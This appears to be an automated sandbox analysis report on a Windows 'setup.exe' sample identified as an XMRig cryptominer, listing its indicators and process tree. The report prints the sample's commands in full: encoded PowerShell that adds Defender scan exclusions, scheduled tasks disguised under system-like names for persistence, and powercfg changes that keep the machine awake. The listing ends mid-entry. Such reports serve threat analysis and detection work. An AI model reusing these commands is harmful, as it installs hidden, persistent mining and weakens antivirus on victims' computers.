xmrig | 1dea3e86c77debbf0bc3446255b287327cab8bbf8194fb96d64b598d2ef65dab

Analysis

max time kernel
150s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
27-03-2023 00:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

setup.exe
Size

254KB
MD5

033e6af2279b3369bb2e84380ba16e06
SHA1

ce48d90ad361f8b3c02a0191ac0f03901b49a34a
SHA256

1dea3e86c77debbf0bc3446255b287327cab8bbf8194fb96d64b598d2ef65dab
SHA512

5306be70bf8a178bf43c667b732054ca1bbe3f90c1251f7163b9727f823928e3c140a96fe29ef9f6c34f0d15804274db058c007fb206df0b2ab26f6aec9dd89e
SSDEEP

3072:xl19lw0riDYFmfs/6uycZ4koUoq3c4GGYIuoBOqIBjmFPokgaLnOnnZNBhFw7R7x:vlw0hus3OUiGYD3oPRgauNBo7

Score

10^/10

xmrig miner

Malware Config

Signatures

XMRig Miner payload 10 IoCs

miner

Processes:

resource	yara_rule
C:\ProgramData\Dllhost\winlogson.exe	family_xmrig
C:\ProgramData\Dllhost\winlogson.exe	xmrig
behavioral2/memory/1928-326-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral2/memory/1928-327-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral2/memory/1928-328-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral2/memory/1928-330-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral2/memory/1928-332-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral2/memory/1928-333-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral2/memory/1928-334-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral2/memory/1928-335-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Downloads MZ/PE file
Drops file in Drivers directory 1 IoCs

Processes:

AppLaunch.exe

description ioc process

File opened for modification C:\Windows\system32\drivers\etc\hosts AppLaunch.exe
Executes dropped EXE 2 IoCs

Processes:

dllhost.exewinlogson.exe

pid process

2224 dllhost.exe
1928 winlogson.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Suspicious use of SetThreadContext 1 IoCs

Processes:

setup.exe

description pid process target process

PID 432 set thread context of 4912 432 setup.exe AppLaunch.exe
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

4328 432 WerFault.exe setup.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	AppLaunch.exe

pid	process
2224	dllhost.exe
1928	winlogson.exe

description	pid	process	target process
PID 432 set thread context of 4912	432	setup.exe	AppLaunch.exe

pid	pid_target	process	target process
4328	432	WerFault.exe	setup.exe

Creates scheduled task(s) 1 TTPs 9 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
2776	schtasks.exe
2656	schtasks.exe
5100	schtasks.exe
1164	schtasks.exe
4296	schtasks.exe
4368	schtasks.exe
1936	schtasks.exe
980	schtasks.exe
1908	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

AppLaunch.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedllhost.exe

pid	process
4912	AppLaunch.exe
2156	powershell.exe
2156	powershell.exe
1828	powershell.exe
1828	powershell.exe
4352	powershell.exe
4352	powershell.exe
4028	powershell.exe
4028	powershell.exe
4004	powershell.exe
4004	powershell.exe
2708	powershell.exe
2708	powershell.exe
1828	powershell.exe
4352	powershell.exe
4028	powershell.exe
4004	powershell.exe
2708	powershell.exe
2224	dllhost.exe
2224	dllhost.exe
2224	dllhost.exe
2224	dllhost.exe
2224	dllhost.exe
2224	dllhost.exe
2224	dllhost.exe
2224	dllhost.exe
2224	dllhost.exe
2224	dllhost.exe
2224	dllhost.exe
2224	dllhost.exe
2224	dllhost.exe
2224	dllhost.exe
2224	dllhost.exe
2224	dllhost.exe
2224	dllhost.exe
2224	dllhost.exe
2224	dllhost.exe
2224	dllhost.exe
2224	dllhost.exe
2224	dllhost.exe
2224	dllhost.exe
2224	dllhost.exe
2224	dllhost.exe
2224	dllhost.exe
2224	dllhost.exe
2224	dllhost.exe
2224	dllhost.exe
2224	dllhost.exe
2224	dllhost.exe
2224	dllhost.exe
2224	dllhost.exe
2224	dllhost.exe
2224	dllhost.exe
2224	dllhost.exe
2224	dllhost.exe
2224	dllhost.exe
2224	dllhost.exe
2224	dllhost.exe
2224	dllhost.exe
2224	dllhost.exe
2224	dllhost.exe
2224	dllhost.exe
2224	dllhost.exe
2224	dllhost.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

652

pid	process
652

Suspicious use of AdjustPrivilegeToken 22 IoCs

Processes:

AppLaunch.exepowershell.exepowercfg.exepowershell.exepowershell.exepowershell.exepowercfg.exepowershell.exepowershell.exepowercfg.exepowercfg.exepowercfg.exedllhost.exewinlogson.exe

description	pid	process
Token: SeDebugPrivilege	4912	AppLaunch.exe
Token: SeDebugPrivilege	2156	powershell.exe
Token: SeShutdownPrivilege	3176	powercfg.exe
Token: SeCreatePagefilePrivilege	3176	powercfg.exe
Token: SeDebugPrivilege	1828	powershell.exe
Token: SeDebugPrivilege	4352	powershell.exe
Token: SeDebugPrivilege	4028	powershell.exe
Token: SeShutdownPrivilege	4188	powercfg.exe
Token: SeCreatePagefilePrivilege	4188	powercfg.exe
Token: SeDebugPrivilege	4004	powershell.exe
Token: SeDebugPrivilege	2708	powershell.exe
Token: SeShutdownPrivilege	1860	powercfg.exe
Token: SeCreatePagefilePrivilege	1860	powercfg.exe
Token: SeShutdownPrivilege	1656	powercfg.exe
Token: SeCreatePagefilePrivilege	1656	powercfg.exe
Token: SeShutdownPrivilege	4324	powercfg.exe
Token: SeCreatePagefilePrivilege	4324	powercfg.exe
Token: SeShutdownPrivilege	4324	powercfg.exe
Token: SeCreatePagefilePrivilege	4324	powercfg.exe
Token: SeDebugPrivilege	2224	dllhost.exe
Token: SeLockMemoryPrivilege	1928	winlogson.exe
Token: SeLockMemoryPrivilege	1928	winlogson.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

winlogson.exe

pid process

1928 winlogson.exe

pid	process
1928	winlogson.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

setup.exeAppLaunch.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 432 wrote to memory of 4912	432	setup.exe	AppLaunch.exe
PID 432 wrote to memory of 4912	432	setup.exe	AppLaunch.exe
PID 432 wrote to memory of 4912	432	setup.exe	AppLaunch.exe
PID 432 wrote to memory of 4912	432	setup.exe	AppLaunch.exe
PID 432 wrote to memory of 4912	432	setup.exe	AppLaunch.exe
PID 4912 wrote to memory of 1256	4912	AppLaunch.exe	cmd.exe
PID 4912 wrote to memory of 1256	4912	AppLaunch.exe	cmd.exe
PID 4912 wrote to memory of 1256	4912	AppLaunch.exe	cmd.exe
PID 1256 wrote to memory of 2156	1256	cmd.exe	powershell.exe
PID 1256 wrote to memory of 2156	1256	cmd.exe	powershell.exe
PID 1256 wrote to memory of 2156	1256	cmd.exe	powershell.exe
PID 4912 wrote to memory of 2224	4912	AppLaunch.exe	dllhost.exe
PID 4912 wrote to memory of 2224	4912	AppLaunch.exe	dllhost.exe
PID 4912 wrote to memory of 2224	4912	AppLaunch.exe	dllhost.exe
PID 4912 wrote to memory of 4128	4912	AppLaunch.exe	cmd.exe
PID 4912 wrote to memory of 4128	4912	AppLaunch.exe	cmd.exe
PID 4912 wrote to memory of 4128	4912	AppLaunch.exe	cmd.exe
PID 4912 wrote to memory of 4152	4912	AppLaunch.exe	cmd.exe
PID 4912 wrote to memory of 4152	4912	AppLaunch.exe	cmd.exe
PID 4912 wrote to memory of 4152	4912	AppLaunch.exe	cmd.exe
PID 4912 wrote to memory of 4132	4912	AppLaunch.exe	cmd.exe
PID 4912 wrote to memory of 4132	4912	AppLaunch.exe	cmd.exe
PID 4912 wrote to memory of 4132	4912	AppLaunch.exe	cmd.exe
PID 4912 wrote to memory of 2436	4912	AppLaunch.exe	cmd.exe
PID 4912 wrote to memory of 2436	4912	AppLaunch.exe	cmd.exe
PID 4912 wrote to memory of 2436	4912	AppLaunch.exe	cmd.exe
PID 4912 wrote to memory of 2552	4912	AppLaunch.exe	cmd.exe
PID 4912 wrote to memory of 2552	4912	AppLaunch.exe	cmd.exe
PID 4912 wrote to memory of 2552	4912	AppLaunch.exe	cmd.exe
PID 4912 wrote to memory of 4588	4912	AppLaunch.exe	cmd.exe
PID 4912 wrote to memory of 4588	4912	AppLaunch.exe	cmd.exe
PID 4912 wrote to memory of 4588	4912	AppLaunch.exe	cmd.exe
PID 4912 wrote to memory of 4920	4912	AppLaunch.exe	cmd.exe
PID 4912 wrote to memory of 4920	4912	AppLaunch.exe	cmd.exe
PID 4912 wrote to memory of 4920	4912	AppLaunch.exe	cmd.exe
PID 4912 wrote to memory of 4720	4912	AppLaunch.exe	cmd.exe
PID 4912 wrote to memory of 4720	4912	AppLaunch.exe	cmd.exe
PID 4912 wrote to memory of 4720	4912	AppLaunch.exe	cmd.exe
PID 4912 wrote to memory of 4736	4912	AppLaunch.exe	cmd.exe
PID 4912 wrote to memory of 4736	4912	AppLaunch.exe	cmd.exe
PID 4912 wrote to memory of 4736	4912	AppLaunch.exe	cmd.exe
PID 4912 wrote to memory of 1644	4912	AppLaunch.exe	cmd.exe
PID 4912 wrote to memory of 1644	4912	AppLaunch.exe	cmd.exe
PID 4912 wrote to memory of 1644	4912	AppLaunch.exe	cmd.exe
PID 4912 wrote to memory of 4724	4912	AppLaunch.exe	cmd.exe
PID 4912 wrote to memory of 4724	4912	AppLaunch.exe	cmd.exe
PID 4912 wrote to memory of 4724	4912	AppLaunch.exe	cmd.exe
PID 4912 wrote to memory of 4696	4912	AppLaunch.exe	cmd.exe
PID 4912 wrote to memory of 4696	4912	AppLaunch.exe	cmd.exe
PID 4912 wrote to memory of 4696	4912	AppLaunch.exe	cmd.exe
PID 4912 wrote to memory of 4676	4912	AppLaunch.exe	cmd.exe
PID 4912 wrote to memory of 4676	4912	AppLaunch.exe	cmd.exe
PID 4912 wrote to memory of 4676	4912	AppLaunch.exe	cmd.exe
PID 4912 wrote to memory of 380	4912	AppLaunch.exe	cmd.exe
PID 4912 wrote to memory of 380	4912	AppLaunch.exe	cmd.exe
PID 4912 wrote to memory of 380	4912	AppLaunch.exe	cmd.exe
PID 4128 wrote to memory of 5100	4128	cmd.exe	schtasks.exe
PID 4128 wrote to memory of 5100	4128	cmd.exe	schtasks.exe
PID 4128 wrote to memory of 5100	4128	cmd.exe	schtasks.exe
PID 2436 wrote to memory of 2656	2436	cmd.exe	schtasks.exe
PID 2436 wrote to memory of 2656	2436	cmd.exe	schtasks.exe
PID 2436 wrote to memory of 2656	2436	cmd.exe	schtasks.exe
PID 4724 wrote to memory of 1828	4724	cmd.exe	powershell.exe
PID 4724 wrote to memory of 1828	4724	cmd.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:432

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
2⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4912

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C powershell -EncodedCommand "PAAjAE4AMAA2AHUAMABHAG0AOAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAEMANgByAFEAbgBpAEYAaABqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAEsAUwBuAEsAZwAxAFEAYQA2ADgAaAAzAEYARgBPACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjADgARgAjAD4A"
3⤵
- Suspicious use of WriteProcessMemory
PID:1256

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAE4AMAA2AHUAMABHAG0AOAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAEMANgByAFEAbgBpAEYAaABqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAEsAUwBuAEsAZwAxAFEAYQA2ADgAaAAzAEYARgBPACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjADgARgAjAD4A"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2156

C:\ProgramData\Dllhost\dllhost.exe
"C:\ProgramData\Dllhost\dllhost.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2224

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
4⤵
PID:4696

C:\Windows\SysWOW64\chcp.com
chcp 1251
5⤵
PID:5088

C:\ProgramData\Dllhost\winlogson.exe
C:\ProgramData\Dllhost\winlogson.exe -c config.json
5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1928

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C powershell -EncodedCommand "PAAjAEoAMABRAGYATABTAHEAUAARBEMANQBFBDMESQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgARQBDBBoEdQAyBDsEGAQlBEEAOQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMALgQ5AC4EYQBJBCMAPgAgAEAAKAAgADwAIwBVACAESQRNBFIAYgB1ADEEVAB0ACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwAwADYEEgRmAEUAJgRuAD0ETQBzAEoAQAQ0AEYEIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQApACAAPAAjACkEbQBxACoELgRDAB4EGAR3AFcAbwA6BBsEIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAMAQyAEYAOQRtAFoAMwQ/BCMAPgA="
3⤵
PID:4696

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAEoAMABRAGYATABTAHEAUAARBEMANQBFBDMESQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgARQBDBBoEdQAyBDsEGAQlBEEAOQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMALgQ5AC4EYQBJBCMAPgAgAEAAKAAgADwAIwBVACAESQRNBFIAYgB1ADEEVAB0ACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwAwADYEEgRmAEUAJgRuAD0ETQBzAEoAQAQ0AEYEIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQApACAAPAAjACkEbQBxACoELgRDAB4EGAR3AFcAbwA6BBsEIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAMAQyAEYAOQRtAFoAMwQ/BCMAPgA="
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4028

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C powershell -EncodedCommand "PAAjAFUAGAQxBHoAGQQ3BHIALAQjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFQAUgB3AGkANwBmADkAeAAtBGYAIwRQAEoAbAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAEwQzADQEeQBABBcESgBkACMAPgAgAEAAKAAgADwAIwAdBGgAPAQ0AB4ENwQjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAMwBSAGcAPgQWBEcAdQAiBGEAVwBNAEMEEgRHBCMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwBsAB8ERQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBOABYEIQRTAGcAagBOACMAPgA="
3⤵
- Suspicious use of WriteProcessMemory
PID:4724

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAFUAGAQxBHoAGQQ3BHIALAQjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFQAUgB3AGkANwBmADkAeAAtBGYAIwRQAEoAbAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAEwQzADQEeQBABBcESgBkACMAPgAgAEAAKAAgADwAIwAdBGgAPAQ0AB4ENwQjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAMwBSAGcAPgQWBEcAdQAiBGEAVwBNAEMEEgRHBCMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwBsAB8ERQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBOABYEIQRTAGcAagBOACMAPgA="
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1828

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C powershell -EncodedCommand "PAAjAHMAHAQpBG0AagAzBFUANwRRACYEMwQVBCMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAMgAoBHAANwRoADkAMwAyADYEVgA5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwBqAEoALwRQACMAPgAgAEAAKAAgADwAIwA4BE0ESgBFADoEUgA0BHkAbAAmBEQATwRtAEUAIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjAE4AQgQnBBkERwAxAE0EdwBtACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwA4AEUETwAWBGEASAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBEADQAZgAfBDkEMgAUBDUAIwA+AA=="
3⤵
PID:1644

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAHMAHAQpBG0AagAzBFUANwRRACYEMwQVBCMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAMgAoBHAANwRoADkAMwAyADYEVgA5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwBqAEoALwRQACMAPgAgAEAAKAAgADwAIwA4BE0ESgBFADoEUgA0BHkAbAAmBEQATwRtAEUAIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjAE4AQgQnBBkERwAxAE0EdwBtACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwA4AEUETwAWBGEASAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBEADQAZgAfBDkEMgAUBDUAIwA+AA=="
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4004

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C powershell -EncodedCommand "PAAjACYEMQQgBDYARwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsARgBvAHUAQwR6AGgASwQjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAdAA+BDUEQQRHBDQEcABFAEEAIwA+ACAAQAAoACAAPAAjAEEEQgQjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAcgBTACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwBLAHkAHwQjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBuAG4AIwRABEYEbAByACMAPgA="
3⤵
PID:4676

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjACYEMQQgBDYARwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsARgBvAHUAQwR6AGgASwQjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAdAA+BDUEQQRHBDQEcABFAEEAIwA+ACAAQAAoACAAPAAjAEEEQgQjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAcgBTACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwBLAHkAHwQjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBuAG4AIwRABEYEbAByACMAPgA="
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4352

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C powershell -EncodedCommand "PAAjAEgEbwBzAEEEGQRYAB0EWQAxABQEPwQoBE0EQgQ5ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMANQRNBHgALQRBBGoANgA0BCMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwArBBwENQBKBDEARQBQAFIAVgBIBHkAEgRKAEQAeQAjAD4AIABAACgAIAA8ACMASwRPBG0AbQBEBBIEQwAdBGcATwRtAFYAPQRJACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwA7BDkAQgQeBDMAUQAXBC4EIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQApACAAPAAjAEwANgBMAHYATAAyBEUAMwAuBGYAbAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBVAEgEVwAuBEwETQQ9BCMAPgA="
3⤵
PID:4736

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAEgEbwBzAEEEGQRYAB0EWQAxABQEPwQoBE0EQgQ5ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMANQRNBHgALQRBBGoANgA0BCMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwArBBwENQBKBDEARQBQAFIAVgBIBHkAEgRKAEQAeQAjAD4AIABAACgAIAA8ACMASwRPBG0AbQBEBBIEQwAdBGcATwRtAFYAPQRJACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwA7BDkAQgQeBDMAUQAXBC4EIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQApACAAPAAjAEwANgBMAHYATAAyBEUAMwAuBGYAbAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBVAEgEVwAuBEwETQQ9BCMAPgA="
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2708

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C echo mMbЬЬф & SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo anaьXнСIкzУщ5
3⤵
PID:4720

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
4⤵
- Creates scheduled task(s)
PID:980

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C echo 7WU & SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo ДбmрbОГ
3⤵
PID:4920

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
4⤵
- Creates scheduled task(s)
PID:4368

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off & echo & SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo WLшХьQ6
3⤵
PID:380

C:\Windows\SysWOW64\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3176

C:\Windows\SysWOW64\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4188

C:\Windows\SysWOW64\powercfg.exe
powercfg /x -standby-timeout-ac 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1860

C:\Windows\SysWOW64\powercfg.exe
powercfg /x -standby-timeout-dc 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1656

C:\Windows\SysWOW64\powercfg.exe
powercfg /hibernate off
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4324

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
4⤵
- Creates scheduled task(s)
PID:4296

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C echo Э & SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo вcЗН8цлКфс
3⤵
PID:4588

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
4⤵
- Creates scheduled task(s)
PID:1908

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C echo eoОxцuЯEЮщ & SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo iaиZQfжьъеhrMкц
3⤵
PID:2552

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
4⤵
- Creates scheduled task(s)
PID:1164

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C echo R1 & SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo ФbХР
3⤵
- Suspicious use of WriteProcessMemory
PID:2436

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
4⤵
- Creates scheduled task(s)
PID:2656

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C echo u1mЬPвYRЙ4eляcгУжЕz & SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo YрUМяШ
3⤵
PID:4132

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
4⤵
- Creates scheduled task(s)
PID:2776

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C echo BАкoзIЮ4ы & SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo ЙdFwaЗАi
3⤵
PID:4152

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
4⤵
- Creates scheduled task(s)
PID:1936

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C echo NДяпЩ & SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo mшqыыDэРЛАм
3⤵
- Suspicious use of WriteProcessMemory
PID:4128

C:\Windows\SysWOW64\schtasks.exe
